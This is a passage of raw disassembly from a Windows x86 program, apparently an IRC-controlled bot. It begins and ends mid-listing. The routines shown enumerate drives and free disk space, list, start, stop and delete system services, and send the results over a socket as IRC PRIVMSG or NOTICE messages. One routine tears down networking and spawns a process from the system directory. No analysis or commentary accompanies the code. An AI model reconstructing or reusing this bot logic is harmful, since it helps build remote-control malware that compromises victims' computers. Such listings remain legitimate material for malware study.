jnz short loc_40B653
mov byte ptr [esi], 2Ch
inc esi
jmp short loc_40B653
; ---------------------------------------------------------------------------
loc_40B691: ; CODE XREF: sub_40B62E+4B�j
dec esi
mov eax, edi
loc_40B694: ; CODE XREF: sub_40B62E+73�j
lea ecx, [ebp+var_38]
cmp esi, ecx
jb short loc_40B6A3
mov cl, [esi]
mov [eax], cl
inc eax
dec esi
jmp short loc_40B694
; ---------------------------------------------------------------------------
loc_40B6A3: ; CODE XREF: sub_40B62E+6B�j
and byte ptr [eax], 0
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_40B62E endp
; =============== S U B R O U T I N E =======================================
sub_40B6AD proc near ; CODE XREF: sub_40B862+51�p
; sub_40B862+87�p
arg_0 = dword ptr 4
push [esp+arg_0]
call ds:dword_4364C8 ; GetDriveTypeA
sub eax, 0
jz short loc_40B6F0
dec eax
jz short loc_40B6EA
dec eax
dec eax
jz short loc_40B6E4
dec eax
jz short loc_40B6DE
dec eax
jz short loc_40B6D8
dec eax
jz short loc_40B6D2
mov eax, offset word_4294E8
retn
; ---------------------------------------------------------------------------
loc_40B6D2: ; CODE XREF: sub_40B6AD+1D�j
mov eax, offset off_429D5C
retn
; ---------------------------------------------------------------------------
loc_40B6D8: ; CODE XREF: sub_40B6AD+1A�j
mov eax, offset aCdrom ; "Cdrom"
retn
; ---------------------------------------------------------------------------
loc_40B6DE: ; CODE XREF: sub_40B6AD+17�j
mov eax, offset aNetwork ; "Network"
retn
; ---------------------------------------------------------------------------
loc_40B6E4: ; CODE XREF: sub_40B6AD+14�j
mov eax, offset aDisk ; "Disk"
retn
; ---------------------------------------------------------------------------
loc_40B6EA: ; CODE XREF: sub_40B6AD+10�j
mov eax, offset aInvalid ; "Invalid"
retn
; ---------------------------------------------------------------------------
loc_40B6F0: ; CODE XREF: sub_40B6AD+D�j
mov eax, offset aUnknown_0 ; "Unknown"
retn
sub_40B6AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B6F6 proc near ; CODE XREF: sub_40B73E+12�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
or eax, 0FFFFFFFFh
mov [ebp+var_18], eax
mov [ebp+var_14], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
mov [ebp+var_4], eax
mov eax, ds:dword_436364
test eax, eax
jz short loc_40B72B
lea ecx, [ebp+var_10]
push ecx
lea ecx, [ebp+var_8]
push ecx
lea ecx, [ebp+var_18]
push ecx
push [ebp+arg_4]
call eax ; GetDiskFreeSpaceExA
loc_40B72B: ; CODE XREF: sub_40B6F6+22�j
mov eax, [ebp+arg_0]
push esi
push edi
push 6
pop ecx
lea esi, [ebp+var_18]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_40B6F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B73E proc near ; CODE XREF: sub_409F1E+1F3�p
; sub_40B862+17�p
var_198 = byte ptr -198h
var_118 = byte ptr -118h
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 198h
push esi
push edi
push [ebp+arg_4]
lea eax, [ebp+var_18]
push eax
call sub_40B6F6
pop ecx
mov esi, eax
pop ecx
lea edi, [ebp+var_18]
push 6
pop ecx
rep movsd
mov eax, [ebp+var_18]
and eax, [ebp+var_14]
cmp eax, 0FFFFFFFFh
jz loc_40B81C
mov eax, [ebp+var_10]
and eax, [ebp+var_C]
cmp eax, 0FFFFFFFFh
jz loc_40B81C
mov eax, [ebp+var_8]
and eax, [ebp+var_4]
cmp eax, 0FFFFFFFFh
jz loc_40B81C
push ebx
mov ebx, 400h
push 0
push ebx
push [ebp+var_14]
push [ebp+var_18]
call sub_417960
push edx
push eax
call sub_40B62E
pop ecx
mov edi, offset aSkb ; "%sKB"
pop ecx
mov esi, 80h
push eax
push edi
lea eax, [ebp+var_198]
push esi
push eax
call sub_4159FA
add esp, 10h
push 0
push ebx
push [ebp+var_C]
push [ebp+var_10]
call sub_417960
push edx
push eax
call sub_40B62E
pop ecx
pop ecx
push eax
push edi
lea eax, [ebp+var_118]
push esi
push eax
call sub_4159FA
add esp, 10h
push 0
push ebx
push [ebp+var_4]
push [ebp+var_8]
call sub_417960
push edx
push eax
call sub_40B62E
pop ecx
pop ecx
push eax
push edi
lea eax, [ebp+var_98]
push esi
push eax
call sub_4159FA
add esp, 10h
pop ebx
jmp short loc_40B84E
; ---------------------------------------------------------------------------
loc_40B81C: ; CODE XREF: sub_40B73E+2C�j
; sub_40B73E+3B�j ...
mov esi, offset aFailed ; "failed"
lea eax, [ebp+var_198]
push esi
push eax
call sub_415480
pop ecx
lea eax, [ebp+var_118]
pop ecx
push esi
push eax
call sub_415480
pop ecx
lea eax, [ebp+var_98]
pop ecx
push esi
push eax
call sub_415480
pop ecx
pop ecx
loc_40B84E: ; CODE XREF: sub_40B73E+DC�j
mov eax, [ebp+arg_0]
push 60h
pop ecx
lea esi, [ebp+var_198]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_40B73E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B862 proc near ; CODE XREF: sub_40B934+17�p
; sub_40B934+60�p
var_500 = byte ptr -500h
var_300 = byte ptr -300h
var_180 = byte ptr -180h
var_100 = byte ptr -100h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 500h
push ebx
mov ebx, [ebp+arg_C]
push esi
push edi
lea eax, [ebp+var_300]
push ebx
push eax
call sub_40B73E
push 60h
mov esi, eax
pop ecx
lea edi, [ebp+var_300]
rep movsd
push 60h
lea esi, [ebp+var_300]
pop ecx
lea edi, [ebp+var_180]
lea eax, [ebp+var_80]
push offset aFailed ; "failed"
rep movsd
push eax
call sub_4158A0
add esp, 10h
test eax, eax
jnz short loc_40B8D5
push ebx
push ebx
call sub_40B6AD
pop ecx
push eax
push offset unk_429DBC
lea eax, [ebp+var_500]
push 200h
push eax
call sub_4159FA
add esp, 14h
jmp short loc_40B909
; ---------------------------------------------------------------------------
loc_40B8D5: ; CODE XREF: sub_40B862+4D�j
lea eax, [ebp+var_180]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_80]
push eax
push ebx
push ebx
call sub_40B6AD
pop ecx
push eax
push offset unk_429D70
lea eax, [ebp+var_500]
push 200h
push eax
call sub_4159FA
add esp, 20h
loc_40B909: ; CODE XREF: sub_40B862+71�j
push 1
lea eax, [ebp+var_500]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BAE7
lea eax, [ebp+var_500]
push eax
call sub_40A5B3
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_40B862 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B934 proc near ; CODE XREF: sub_40D2E0+57F0�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
xor ebx, ebx
cmp [ebp+arg_C], ebx
jz short loc_40B955
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40B862
add esp, 10h
jmp short loc_40B9B6
; ---------------------------------------------------------------------------
loc_40B955: ; CODE XREF: sub_40B934+9�j
push esi
push edi
push ebx
push ebx
call ds:dword_4363D8 ; GetLogicalDriveStringsA
lea esi, [eax+2]
push esi
call sub_415D2F
pop ecx
mov edi, eax
push edi
push esi
call ds:dword_4363D8 ; GetLogicalDriveStringsA
cmp [edi], bl
mov esi, edi
jz short loc_40B9AD
loc_40B979: ; CODE XREF: sub_40B934+77�j
push offset aA_0 ; "A:\\"
push esi
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz short loc_40B99C
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40B862
add esp, 10h
loc_40B99C: ; CODE XREF: sub_40B934+54�j
push esi
call sub_415C80
cmp [esi+eax+1], bl
lea esi, [esi+eax+1]
pop ecx
jnz short loc_40B979
loc_40B9AD: ; CODE XREF: sub_40B934+43�j
push edi
call sub_415DE1
pop ecx
pop edi
pop esi
loc_40B9B6: ; CODE XREF: sub_40B934+1F�j
pop ebx
pop ebp
retn
sub_40B934 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B9B9 proc near ; DATA XREF: sub_40CB17+11�o
var_2A4 = dword ptr -2A4h
var_25C = byte ptr -25Ch
var_158 = byte ptr -158h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_28 = dword ptr -28h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 25Ch
push ebx
push esi
push edi
push ds:dword_43BECC
call ds:dword_436500 ; closesocket
call sub_4150F5
call ds:dword_4363C8 ; WSACleanup
call ds:dword_4363C8 ; WSACleanup
mov ebx, ds:dword_422054
push 64h
call ebx ; Sleep
xor edi, edi
push 10h
lea eax, [ebp+var_10]
push edi
push eax
call sub_415500
push 44h
lea eax, [ebp+var_54]
pop esi
push esi
push edi
push eax
call sub_415500
add esp, 18h
mov [ebp+var_54], esi
mov esi, 104h
lea eax, [ebp+var_25C]
push esi
push eax
mov [ebp+var_48], offset byte_4325D8
mov [ebp+var_28], 1
mov [ebp+var_24], di
call ds:dword_422058 ; GetSystemDirectoryA
lea eax, [ebp+var_158]
push esi
push eax
push edi
call ds:off_422060
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
lea eax, [ebp+var_25C]
push eax
push edi
push 28h
push 1
push edi
lea eax, [ebp+var_158]
push edi
push eax
push edi
call ds:dword_422104 ; CreateProcessA
test eax, eax
jz short loc_40BA7E
push 64h
call ebx ; Sleep
push [ebp+var_10]
mov esi, ds:off_422074
call esi ; sub_4DB3D5
push [ebp+var_C]
call esi ; sub_4DB3D5
loc_40BA7E: ; CODE XREF: sub_40B9B9+AF�j
mov eax, [ebp+arg_8]
mov dword ptr [eax+0B0h], offset dword_43A870
mov eax, [esp+2A4h+var_2A4]
mov large fs:0, eax
add esp, 8
push edi
call ds:off_42212C
pop edi
pop esi
pop ebx
sub_40B9B9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BAA1 proc near ; CODE XREF: sub_40D168+3D�p
; sub_40D2E0+1CB�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_200]
push [ebp+arg_4]
push 200h
push eax
call sub_41751F
add esp, 10h
lea eax, [ebp+var_200]
push 0
push eax
call sub_415C80
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call ds:dword_4364B8 ; send
leave
retn
sub_40BAA1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BAE7 proc near ; CODE XREF: sub_401000+8B�p
; sub_40144A+76�p ...
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 400h
cmp [ebp+arg_C], 0
push esi
push edi
mov edi, offset aNotice ; "NOTICE"
jnz short loc_40BB02
mov edi, offset aPrivmsg ; "PRIVMSG"
loc_40BB02: ; CODE XREF: sub_40BAE7+14�j
push edi
call sub_415C80
push [ebp+arg_4]
mov esi, 1FAh
sub esi, eax
call sub_415C80
pop ecx
sub esi, eax
pop ecx
lea eax, [ebp+var_400]
push [ebp+arg_8]
push offset aS_2 ; "%s"
push esi
push eax
call sub_4159FA
add esp, 10h
lea eax, [ebp+var_400]
push eax
lea eax, [ebp+var_200]
push [ebp+arg_4]
push edi
push offset dword_429E9C
push eax
call sub_415480
add esp, 14h
lea eax, [ebp+var_200]
push 0
push eax
call sub_415C80
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call ds:dword_4364B8 ; send
cmp [ebp+arg_10], 0
pop edi
pop esi
jz short locret_40BB85
push 7D0h
call ds:dword_422054 ; Sleep
locret_40BB85: ; CODE XREF: sub_40BAE7+91�j
leave
retn
sub_40BAE7 endp
; =============== S U B R O U T I N E =======================================
sub_40BB87 proc near ; CODE XREF: sub_40D2E0:loc_40F3F2�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
push edi
mov edi, [esp+8+arg_4]
test edi, edi
jz short loc_40BBDF
lea esi, [eax+eax*2]
push 0
shl esi, 2
push 0
push ds:dword_429EC0[esi]
push edi
push eax
call sub_40BC01
add esp, 14h
test eax, eax
jnz short loc_40BBCF
push edi
push ds:off_429EBC[esi]
push offset dword_429FEC
loc_40BBBF: ; CODE XREF: sub_40BB87+56�j
mov esi, offset dword_43AF38
push esi
call sub_415480
add esp, 10h
jmp short loc_40BBFC
; ---------------------------------------------------------------------------
loc_40BBCF: ; CODE XREF: sub_40BB87+2A�j
push eax
call sub_40BCA3
pop ecx
push eax
push edi
push offset dword_429FB4
jmp short loc_40BBBF
; ---------------------------------------------------------------------------
loc_40BBDF: ; CODE XREF: sub_40BB87+C�j
lea eax, [eax+eax*2]
mov esi, offset dword_43AF38
push ds:off_429EB8[eax*4]
push offset dword_429F80
push esi
call sub_415480
add esp, 0Ch
loc_40BBFC: ; CODE XREF: sub_40BB87+46�j
mov eax, esi
pop edi
pop esi
retn
sub_40BB87 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BC01 proc near ; CODE XREF: sub_40BB87+20�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
call ds:dword_43645C ; OpenSCManagerA
mov edi, eax
cmp edi, ebx
jnz short loc_40BC28
call ds:dword_42206C ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_40BC9D
; ---------------------------------------------------------------------------
loc_40BC28: ; CODE XREF: sub_40BC01+1B�j
push esi
push 0F01FFh
push [ebp+arg_4]
push edi
call ds:dword_436350 ; OpenServiceA
mov esi, eax
cmp esi, ebx
jnz short loc_40BC48
call ds:dword_42206C ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_40BC95
; ---------------------------------------------------------------------------
loc_40BC48: ; CODE XREF: sub_40BC01+3B�j
mov eax, [ebp+arg_0]
cmp eax, 1
jz short loc_40BC7B
cmp eax, 3
jz short loc_40BC6C
jle short loc_40BC8E
cmp eax, 6
jg short loc_40BC8E
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_8]
push esi
call ds:dword_4363B8 ; ControlService
jmp short loc_40BC82
; ---------------------------------------------------------------------------
loc_40BC6C: ; CODE XREF: sub_40BC01+52�j
push [ebp+arg_10]
push [ebp+arg_C]
push esi
call ds:dword_436358 ; StartServiceA
jmp short loc_40BC82
; ---------------------------------------------------------------------------
loc_40BC7B: ; CODE XREF: sub_40BC01+4D�j
push esi
call ds:dword_4363BC ; DeleteService
loc_40BC82: ; CODE XREF: sub_40BC01+69�j
; sub_40BC01+78�j
test eax, eax
jnz short loc_40BC8E
call ds:dword_42206C ; RtlGetLastWin32Error
mov ebx, eax
loc_40BC8E: ; CODE XREF: sub_40BC01+54�j
; sub_40BC01+59�j ...
push esi
call ds:dword_43636C ; CloseServiceHandle
loc_40BC95: ; CODE XREF: sub_40BC01+45�j
push edi
call ds:dword_43636C ; CloseServiceHandle
pop esi
loc_40BC9D: ; CODE XREF: sub_40BC01+25�j
mov eax, ebx
pop edi
pop ebx
leave
retn
sub_40BC01 endp
; =============== S U B R O U T I N E =======================================
sub_40BCA3 proc near ; CODE XREF: sub_40BB87+49�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, 420h
cmp eax, ecx
ja loc_40BD58
jz loc_40BD51
add ecx, 0FFFFFFFBh
cmp eax, ecx
ja short loc_40BD1B
jz short loc_40BD11
mov ecx, eax
sub ecx, 3
jz short loc_40BD07
dec ecx
dec ecx
jz short loc_40BCFD
dec ecx
jz short loc_40BCF3
sub ecx, 51h
jz short loc_40BCE9
sub ecx, 24h
jnz loc_40BDCE ; default
; jumptable 0040BD75 cases 1,5,6,8,9,12,13,15,16
push offset aTheSpecifiedSe ; "The specified service name is invalid."
jmp loc_40BDC0
; ---------------------------------------------------------------------------
loc_40BCE9: ; CODE XREF: sub_40BCA3+31�j
push offset aTheRequestedCo ; "The requested control code is undefined"...
jmp loc_40BDC0
; ---------------------------------------------------------------------------
loc_40BCF3: ; CODE XREF: sub_40BCA3+2C�j
push offset aTheHandleIsInv ; "The handle is invalid."
jmp loc_40BDC0
; ---------------------------------------------------------------------------
loc_40BCFD: ; CODE XREF: sub_40BCA3+29�j
push offset aTheHandleDoesN ; "The handle does not have the required a"...
jmp loc_40BDC0
; ---------------------------------------------------------------------------
loc_40BD07: ; CODE XREF: sub_40BCA3+25�j
push offset aTheServiceBina ; "The service binary file could not be fo"...
jmp loc_40BDC0
; ---------------------------------------------------------------------------
loc_40BD11: ; CODE XREF: sub_40BCA3+1E�j
push offset aTheServiceCann ; "The service cannot be stopped because o"...
jmp loc_40BDC0
; ---------------------------------------------------------------------------
loc_40BD1B: ; CODE XREF: sub_40BCA3+1C�j
mov ecx, eax
sub ecx, 41Ch
jz short loc_40BD4A
dec ecx
jz short loc_40BD43
dec ecx
jz short loc_40BD3C
dec ecx
jnz loc_40BDCE ; default
; jumptable 0040BD75 cases 1,5,6,8,9,12,13,15,16
push offset aTheDatabaseIsL ; "The database is locked."
jmp loc_40BDC0
; ---------------------------------------------------------------------------
loc_40BD3C: ; CODE XREF: sub_40BCA3+86�j
push offset aAThreadCouldNo ; "A thread could not be created for the s"...
jmp short loc_40BDC0
; ---------------------------------------------------------------------------
loc_40BD43: ; CODE XREF: sub_40BCA3+83�j
push offset aTheProcessForT ; "The process for the service was started"...
jmp short loc_40BDC0
; ---------------------------------------------------------------------------
loc_40BD4A: ; CODE XREF: sub_40BCA3+80�j
push offset aTheRequested_0 ; "The requested control code is not valid"...
jmp short loc_40BDC0
; ---------------------------------------------------------------------------
loc_40BD51: ; CODE XREF: sub_40BCA3+11�j
push offset aAnInstanceOfTh ; "An instance of the service is already r"...
jmp short loc_40BDC0
; ---------------------------------------------------------------------------
loc_40BD58: ; CODE XREF: sub_40BCA3+B�j
mov ecx, 45Bh
cmp eax, ecx
ja short loc_40BDCE ; default
; jumptable 0040BD75 cases 1,5,6,8,9,12,13,15,16
jz short loc_40BDBB
lea ecx, [eax-422h]
cmp ecx, 11h ; switch 18 cases
ja short loc_40BDCE ; default
; jumptable 0040BD75 cases 1,5,6,8,9,12,13,15,16
movzx ecx, byte_40BE0F[ecx]
jmp off_40BDE7[ecx*4] ; switch jump
loc_40BD7C: ; DATA XREF: _0:off_40BDE7�o
push offset aTheSpecifiedDa ; jumptable 0040BD75 case 7
jmp short loc_40BDC0
; ---------------------------------------------------------------------------
loc_40BD83: ; CODE XREF: sub_40BCA3+D2�j
; DATA XREF: _0:off_40BDE7�o
push offset aTheServiceDepe ; jumptable 0040BD75 case 17
jmp short loc_40BDC0
; ---------------------------------------------------------------------------
loc_40BD8A: ; CODE XREF: sub_40BCA3+D2�j
; DATA XREF: _0:off_40BDE7�o
push offset aTheServiceDe_0 ; jumptable 0040BD75 case 10
jmp short loc_40BDC0
; ---------------------------------------------------------------------------
loc_40BD91: ; CODE XREF: sub_40BCA3+D2�j
; DATA XREF: _0:off_40BDE7�o
push offset aTheServiceHasB ; jumptable 0040BD75 case 0
jmp short loc_40BDC0
; ---------------------------------------------------------------------------
loc_40BD98: ; CODE XREF: sub_40BCA3+D2�j
; DATA XREF: _0:off_40BDE7�o
push offset aTheSpecified_0 ; jumptable 0040BD75 case 2
jmp short loc_40BDC0
; ---------------------------------------------------------------------------
loc_40BD9F: ; CODE XREF: sub_40BCA3+D2�j
; DATA XREF: _0:off_40BDE7�o
push offset aTheServiceCoul ; jumptable 0040BD75 case 11
jmp short loc_40BDC0
; ---------------------------------------------------------------------------
loc_40BDA6: ; CODE XREF: sub_40BCA3+D2�j
; DATA XREF: _0:off_40BDE7�o
push offset aTheServiceHa_0 ; jumptable 0040BD75 case 14
jmp short loc_40BDC0
; ---------------------------------------------------------------------------
loc_40BDAD: ; CODE XREF: sub_40BCA3+D2�j
; DATA XREF: _0:off_40BDE7�o
push offset aTheRequested_1 ; jumptable 0040BD75 case 3
jmp short loc_40BDC0
; ---------------------------------------------------------------------------
loc_40BDB4: ; CODE XREF: sub_40BCA3+D2�j
; DATA XREF: _0:off_40BDE7�o
push offset aTheServiceHasN ; jumptable 0040BD75 case 4
jmp short loc_40BDC0
; ---------------------------------------------------------------------------
loc_40BDBB: ; CODE XREF: sub_40BCA3+BE�j
push offset aTheSystemIsShu ; "The system is shutting down."
loc_40BDC0: ; CODE XREF: sub_40BCA3+41�j
; sub_40BCA3+4B�j ...
push offset dword_43A878
call sub_415480
pop ecx
pop ecx
jmp short loc_40BDE1
; ---------------------------------------------------------------------------
loc_40BDCE: ; CODE XREF: sub_40BCA3+36�j
; sub_40BCA3+89�j ...
push eax ; default
; jumptable 0040BD75 cases 1,5,6,8,9,12,13,15,16
push offset aAnUnknownErr_0 ; "An unknown error occurred: <%ld>"
push offset dword_43A878
call sub_415480
add esp, 0Ch
loc_40BDE1: ; CODE XREF: sub_40BCA3+129�j
mov eax, offset dword_43A878
retn
sub_40BCA3 endp
; ---------------------------------------------------------------------------
off_40BDE7 dd offset loc_40BD91 ; DATA XREF: sub_40BCA3+D2�r
dd offset loc_40BD98 ; jump table for switch statement
dd offset loc_40BDAD
dd offset loc_40BDB4
dd offset loc_40BD7C
dd offset loc_40BD8A
dd offset loc_40BD9F
dd offset loc_40BDA6
dd offset loc_40BD83
dd offset loc_40BDCE
byte_40BE0F db 0, 9, 1, 2 ; DATA XREF: sub_40BCA3+CB�r
db 3, 9, 9, 4 ; indirect table for switch statement
db 9, 9, 5, 6
db 9, 9, 7, 9
db 9, 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BE21 proc near ; CODE XREF: sub_40D2E0+2094�p
var_38C = byte ptr -38Ch
var_18C = byte ptr -18Ch
var_188 = byte ptr -188h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38Ch
push ebx
push esi
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
mov [ebp+var_8], ebx
call ds:dword_43645C ; OpenSCManagerA
push ebx
mov [ebp+var_C], eax
push [ebp+arg_8]
push offset aTheFollowingWi ; "The following Windows services are regi"...
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BAE7
add esp, 14h
loc_40BE59: ; CODE XREF: sub_40BE21+120�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_18C]
push 168h
push eax
push 3
push 30h
push [ebp+var_C]
call ds:dword_436428 ; EnumServicesStatusA
test eax, eax
jnz short loc_40BE93
call ds:dword_42206C ; RtlGetLastWin32Error
cmp eax, 0EAh
jnz loc_40BF47
loc_40BE93: ; CODE XREF: sub_40BE21+5F�j
xor edi, edi
cmp [ebp+var_4], ebx
jle loc_40BF3E
lea esi, [ebp+var_188]
loc_40BEA4: ; CODE XREF: sub_40BE21+117�j
mov eax, [esi+8]
dec eax
jz short loc_40BEED
dec eax
jz short loc_40BEE6
dec eax
jz short loc_40BEDF
dec eax
jz short loc_40BED8
dec eax
jz short loc_40BED1
dec eax
jz short loc_40BECA
dec eax
jz short loc_40BEC3
push offset aUnknown_1 ; " Unknown"
jmp short loc_40BEF2
; ---------------------------------------------------------------------------
loc_40BEC3: ; CODE XREF: sub_40BE21+99�j
push offset aPaused_0 ; " Paused"
jmp short loc_40BEF2
; ---------------------------------------------------------------------------
loc_40BECA: ; CODE XREF: sub_40BE21+96�j
push offset aPausing ; " Pausing"
jmp short loc_40BEF2
; ---------------------------------------------------------------------------
loc_40BED1: ; CODE XREF: sub_40BE21+93�j
push offset aContinuing ; " Continuing"
jmp short loc_40BEF2
; ---------------------------------------------------------------------------
loc_40BED8: ; CODE XREF: sub_40BE21+90�j
push offset aRunning ; " Running"
jmp short loc_40BEF2
; ---------------------------------------------------------------------------
loc_40BEDF: ; CODE XREF: sub_40BE21+8D�j
push offset aStoping ; " Stoping"
jmp short loc_40BEF2
; ---------------------------------------------------------------------------
loc_40BEE6: ; CODE XREF: sub_40BE21+8A�j
push offset aStarting ; " Starting"
jmp short loc_40BEF2
; ---------------------------------------------------------------------------
loc_40BEED: ; CODE XREF: sub_40BE21+87�j
push offset aStopped ; " Stopped"
loc_40BEF2: ; CODE XREF: sub_40BE21+A0�j
; sub_40BE21+A7�j ...
lea eax, [ebp+var_20]
push eax
call sub_415480
pop ecx
lea eax, [ebp+var_20]
pop ecx
push dword ptr [esi]
push dword ptr [esi-4]
push eax
lea eax, [ebp+var_38C]
push offset aSSS ; "%s: %s (%s)"
push eax
call sub_415480
push 1
lea eax, [ebp+var_38C]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BAE7
add esp, 28h
inc edi
add esi, 24h
cmp edi, [ebp+var_4]
jl loc_40BEA4
loc_40BF3E: ; CODE XREF: sub_40BE21+77�j
cmp [ebp+var_8], ebx
jnz loc_40BE59
loc_40BF47: ; CODE XREF: sub_40BE21+6C�j
push [ebp+var_C]
call ds:dword_43636C ; CloseServiceHandle
xor eax, eax
pop edi
cmp eax, [ebp+var_4]
pop esi
pop ebx
sbb eax, eax
neg eax
leave
retn
sub_40BE21 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BF5E proc near ; CODE XREF: sub_40D2E0:loc_40F422�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
test edi, edi
jz loc_40BFF8
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, 0
jz short loc_40BF87
dec eax
jnz short loc_40BFD8
push edi
push 0
call sub_40C131
pop ecx
pop ecx
jmp short loc_40BFD4
; ---------------------------------------------------------------------------
loc_40BF87: ; CODE XREF: sub_40BF5E+18�j
cmp [ebp+arg_8], 0
jnz short loc_40BFC6
push 24h
push edi
call sub_417070
pop ecx
test eax, eax
pop ecx
jnz short loc_40BFC6
push 57h
pop eax
loc_40BF9E: ; CODE XREF: sub_40BF5E+78�j
push eax
call sub_40C925
pop ecx
push eax
lea eax, [esi+esi*2]
push edi
mov esi, offset dword_43AB34
push ds:off_429EB8[eax*4]
push offset dword_42A5B0
push esi
call sub_415480
add esp, 14h
jmp short loc_40C018
; ---------------------------------------------------------------------------
loc_40BFC6: ; CODE XREF: sub_40BF5E+2D�j
; sub_40BF5E+3B�j
push [ebp+arg_8]
push edi
push 0
call sub_40C085
add esp, 0Ch
loc_40BFD4: ; CODE XREF: sub_40BF5E+27�j
test eax, eax
jnz short loc_40BF9E
loc_40BFD8: ; CODE XREF: sub_40BF5E+1B�j
lea eax, [esi+esi*2]
push edi
mov esi, offset dword_43AB34
push ds:off_429EBC[eax*4]
push offset dword_42A584
push esi
call sub_415480
add esp, 10h
jmp short loc_40C018
; ---------------------------------------------------------------------------
loc_40BFF8: ; CODE XREF: sub_40BF5E+A�j
mov eax, [ebp+arg_0]
mov esi, offset dword_43AB34
lea eax, [eax+eax*2]
push ds:off_429EB8[eax*4]
push offset dword_42A550
push esi
call sub_415480
add esp, 0Ch
loc_40C018: ; CODE XREF: sub_40BF5E+66�j
; sub_40BF5E+98�j
mov eax, esi
pop edi
pop esi
pop ebp
retn
sub_40BF5E endp
; =============== S U B R O U T I N E =======================================
sub_40C01E proc near ; CODE XREF: sub_4143F6+245�p
arg_0 = dword ptr 4
arg_C = dword ptr 10h
push esi
xor esi, esi
cmp [esp+4+arg_0], esi
jnz short loc_40C02B
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40C02B: ; CODE XREF: sub_40C01E+7�j
push ebx
push ebp
push edi
push esi
push esi
push esi
mov edi, ds:dword_422130
push esi
push 0FFFFFFFFh
mov ebx, 400h
push [esp+24h+arg_0]
push ebx
push esi
call edi ; WideCharToMultiByte
test ds:byte_43AD34, 1
mov ebp, eax
jnz short loc_40C068
or ds:byte_43AD34, 1
lea eax, [ebp+1]
push eax
call sub_4167A5
pop ecx
mov ds:dword_43AAD4, eax
loc_40C068: ; CODE XREF: sub_40C01E+32�j
push esi
push esi
push ebp
push ds:dword_43AAD4
push 0FFFFFFFFh
